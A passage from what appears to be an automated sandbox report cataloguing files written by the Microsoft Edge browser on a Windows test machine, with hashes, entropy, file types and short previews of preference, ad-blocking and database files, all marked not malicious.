SHA-512:	57D5C6335711031ABDBEDA2BC8EC72760AEA97B8083C28BA08CE662B681E27A917D0B4CE487B6E3764D854CD7F7D8ED86C4692E4371C38D6433AD3514013D702
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1731210918"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\365b5208-a4ea-4ee7-bf68-479276b9bc1e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640139822627159
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7o:fwUQC5VwBIiElEd2K57P7o
MD5:	3F661497580210A9A5B194DBDE387CBD
SHA1:	AC5DA82539FDF967C0D29284446BBF33C1023DE3
SHA-256:	8615001DB8EA389D4FF271071160DD5F17A56A2FF6412C3D0A77531FBA8234C1
SHA-512:	8B7CE599B9C5A232BBB45152B5FE7850C2A7161EE914B04A63EDB0EF313D6C5A53962614F664908518B630D97F84C0EA5FED4CC0404D10EF9E5B6D58AB037437
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640139822627159
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7o:fwUQC5VwBIiElEd2K57P7o
MD5:	3F661497580210A9A5B194DBDE387CBD
SHA1:	AC5DA82539FDF967C0D29284446BBF33C1023DE3
SHA-256:	8615001DB8EA389D4FF271071160DD5F17A56A2FF6412C3D0A77531FBA8234C1
SHA-512:	8B7CE599B9C5A232BBB45152B5FE7850C2A7161EE914B04A63EDB0EF313D6C5A53962614F664908518B630D97F84C0EA5FED4CC0404D10EF9E5B6D58AB037437
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67302EA1-1C30.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.5459950105389803
Encrypted:	false
SSDEEP:	6144:PlGpLbGymkcLeoBR/qDiFG/W80jaHe/Nt:7kcKowZ
MD5:	9EBD09E1F9301ED04FC2AABED5DC90A5
SHA1:	4F249D86F5FB9BA17707EBFFC56AD1DA7CB926F5
SHA-256:	AB7F4FE8DD37F93BDA917F41C8A2DE2BF64030D7CBCF520ACCCABA6880B176A4
SHA-512:	B3989389517A26F977C61CBED5B10FDAFCF04A61709EDA273F6879C7136571F33F0DB4D87843AF86E4EA1E8BC428057F046F8DC653B9DA0DCD2C6F1E89A4826B
Malicious:	false
Preview:	...@..@...@.....C.].....@..................`...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".hvhedk20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.........m...... .2.........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.132041621771752
Encrypted:	false
SSDEEP:	3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
MD5:	845CFA59D6B52BD2E8C24AC83A335C66
SHA1:	6882BB1CE71EB14CEF73413EFC591ACF84C63C75
SHA-256:	29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
SHA-512:	8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
Malicious:	false
Preview:	sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1b32ffb6-1847-416d-bfc8-4deb8daf0c8e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\39a550df-317c-4f48-8aba-3b1d2d715189.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17314), with no line terminators
Category:	dropped
Size (bytes):	17318
Entropy (8bit):	5.478207549729616
Encrypted:	false
SSDEEP:	384:st4PGKSu47sogdfhrGC2hW4IurLMABbGNQwP6WjaTYDN:seOxuIgdf8C2hzbG+MHaTYDN
MD5:	099861F473C9D7DE93674BA4ECF7D0D9
SHA1:	70C02C7DD4144FCAED732DAE4C3E0623E9F4EC7C
SHA-256:	7B4F3EA4D5833428A7661CF05CD9BC6B2A8F35799C0E26BBB81EDEEEA69B9488
SHA-512:	4D5BFED144C9CB62D076AE20388655A3281A9BCFB1A6A28AC51E3E02F8CDDD51974ADC53AB057617077BC5B66D67A6173459983C76AEB8A0E213D6D5DCAE1789
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375684514153445","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\45b0a35e-16b7-448f-8e7d-f799df3fcb85.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17479), with no line terminators
Category:	dropped
Size (bytes):	17483
Entropy (8bit):	5.474809923151055
Encrypted:	false
SSDEEP:	384:st4PGKSu47sogdfhrGC2hW4IurLMABbGNQwP6WvlaTYDN:seOxuIgdf8C2hzbG+MpaTYDN
MD5:	0116A3D8CC0F1B0A6188B4F453FF15C3
SHA1:	F8FC652596FB88354F0A9BFE3A500AFAF58427E2
SHA-256:	6F09CF9DC06393F6BE214D68913B17F8D42F0C5C5D3B84DCAC39C919511A7EDA
SHA-512:	5A2D58D8E144ADD23CB002BED05110FEC8184AAE7611D7734F530D12FF2CBE8B2D1E6D855EE6397D29645771F4F64BB004F80E5DA243C379F9CC70B7A53A3A3E
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375684514153445","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\4f8a0599-298d-4a12-8989-8f5ea23cc305.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\4fb1c56b-3207-486a-87ff-0247f2ed8803.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	13255
Entropy (8bit):	5.219475857793956
Encrypted:	false
SSDEEP:	192:st4J99QTryDigabatSuyp7sogdsZihUkgM/NYn8hbV+Fu+QwCL66WjaFIMYXP7U8:st4PGKSu47sogdfhJBbGNQwP6WjaTYDN
MD5:	C7F98F05BAAB7E63239EF75E33B45563
SHA1:	0B68D90E5EB4600837C69F3F5E5BD4E7A2180D05
SHA-256:	960E7B6448363E4CBE0D437DDB125FD8FBA22043422C7B5F8ED0493E90EB35CA
SHA-512:	CAD33EC9DDE3CF87B1F3A2CAC319808DD8DD88E7B8D479A4A65671EE0BEBB5EAA60EF03752CA9FE2F1EED5658CBE9192D38FCAEAAFFB9BA78BC034F19BFB450F
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375684514153445","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5a89cd09-efc6-4688-838f-05c8443ed7f7.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40504
Entropy (8bit):	5.561404249277557
Encrypted:	false
SSDEEP:	768:tSdGuW7pLGLp/pWPtFf+u8F1+UoAYDCx9Tuqh0VfUC9xbog/OVOhvArtyrw0vrYc:tSdGu2cp/pWPtFf+uu1jabhvct30vrxl
MD5:	698CB0CA45EBA3FBD7F03E359E7FF1CD
SHA1:	304F7A51DD4EA6FCF67B8FC9AB6AFE25B979050E
SHA-256:	33544B88EF7019038B5ADEFA2C6604AC96A404BCDAA868C40E067F12BC86E6DD
SHA-512:	73280F2EDFDEDF70A85B36C5D82166907462D075A08397D167C48B5A022E9459516D36E6C50485118C49F2ED3384E67E5574BB9C9B25C2A2AEB9A63A0C2A5162
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375684513569482","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375684513569482","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9b41be3b-dce2-496f-b691-ac6ebad89836.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17523), with no line terminators
Category:	dropped
Size (bytes):	17527
Entropy (8bit):	5.473162638952093
Encrypted:	false
SSDEEP:	384:st4PGKSu47s6gdfhrGC2hW4IurLMABbGNQwP6WvlaTYDN:seOxuagdf8C2hzbG+MpaTYDN
MD5:	A60EB0618B9CFF6DAADDFEAA60F974B6
SHA1:	5F3D117E40FC243E79A86B690BA9EA0214C07046
SHA-256:	FE52924D575CAA79A99461974886C31AC0C590C6B5547FD927F6E1BA233B3F1D
SHA-512:	289F2FDBEA4F5F260A79FA5DF70F175FDA4A13FF3A416A1C6A3AFE5528AC4A4E872AC7C493750D0491342E8ADB640AF47BC0D1F5B63F2BA4A420EEC61A5CAD27
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375684514153445","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	3.5394429593752084
Encrypted:	false
SSDEEP:	3:iWstvhYNrkUn:iptAd
MD5:	F27314DD366903BBC6141EAE524B0FDE
SHA1:	4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:	68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:	07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:	false
Preview:	...m.................DB_VERSION.1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	309
Entropy (8bit):	5.196098020449495
Encrypted:	false
SSDEEP:	6:H2sNs+81923oH+Tcwtp3hBtB2KLlV2s3tYVq2P923oH+Tcwtp3hBWsIFUv:zN3xYebp3dFL7+v4Yebp3eFUv
MD5:	46DA31D6E11574E4E4EA74655FD6CF37
SHA1:	22EF3B144DA5C9A5744FD5741DDDD5DC3112B9BB
SHA-256:	DA5A0B8113DB24B7506101B4970DFA5109F963706D5E200C3A83C81453AEC225
SHA-512:	27F7C4233A82DDCDBCCDF296B149B04C48CE8C8BA982A4FBE9DC2C3DEA51598F91A5EBAF6E46A48C3D9BD260B21D914459215F7A0A40DE167330A288CE5CA5F3
Malicious:	false
Preview:	2024/11/09-22:55:19.429 1de0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/11/09-22:55:19.509 1de0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.ldb

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	739857
Entropy (8bit):	7.212329737603097
Encrypted:	false
SSDEEP:	12288:gq1f5g+/pask721JH7SgyIhkNEqeyZ/CSCqEzz5SaOPrHc/K:P5gypaskWt7SgyfNEq1Z/jvQzEaA2K
MD5:	45CAFEFCD3FAC898F2448158E49D9B40
SHA1:	876D3AFE2738DC4BA85381637FB7A74931A5C501
SHA-256:	4EBB3F2B0623821F6BB37A085A62ADAF1194B7621296854AFACEBEAFB3A49B6E
SHA-512:	4FF7A05BDCE82A2B2E5FEA8F633EB084AF0BEE0CA41E3557F7BB2CEDCFED14619F1A589108C2D51B1BC7E683B8AAC73BDFEE1E1DE4E86FB2D8BC2605EABB965C
Malicious:	false
Preview:	....^.'..ASSET:addressbar_uu_files.en-gb........{. "0123movies.com": "{\"Tier1\": [983, 6061], \...2..L4948, 1106, 9972]}",.QL1020398.app.netsuiteR[.@6061, 8405, 5938]6b..228, 236.Z.337x.toB...J.983:C.86657, 475, 4068.JX2cvresearch.decipherincR....:X. 379, 6101.R<3817341.extforms....774..L3cx.integrafin.co.ukB.....,N.. 2863, 539...4540582....[:..1.., 6..P7589.directpaper.nameR..:Q.9I`7a201srvitportl.cymru.nhsN..:F..9870.J.03cjsvmifitla1vJ.AC:N..109]..7.N.livwebbvN..1a.JS...., 9813.. 8ballpoolV~. 741, 3907.8>...9151, 57E..91]5 9anime.gsB~.F'.,574, 485, 76....D.pl.D..?., 160=..EJ..:o....166V...gagR ..3939..>..<378, 44, 1780, 1....8a.leaguerepubliV..)u!.:...676, 899...aad.A..al.azur~..:Q..53...23.. 915, 8133...2}..aat.rm...isR..:W..223...42].Dabc-enviro.tascomiRJ..884>...40!N$4662, 5849=N4bdn.blackboardRQ..7670....:...80..$1240, 3047.].Terdeenshire.sharepointRf..5938.f.214Be..0...30}~.abmwapv..R..!..7662[..mwczK..14>.......cacd...mBt.J...117...(cademic.oupR..)..834AbF...246e)..!..q...

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	2163821
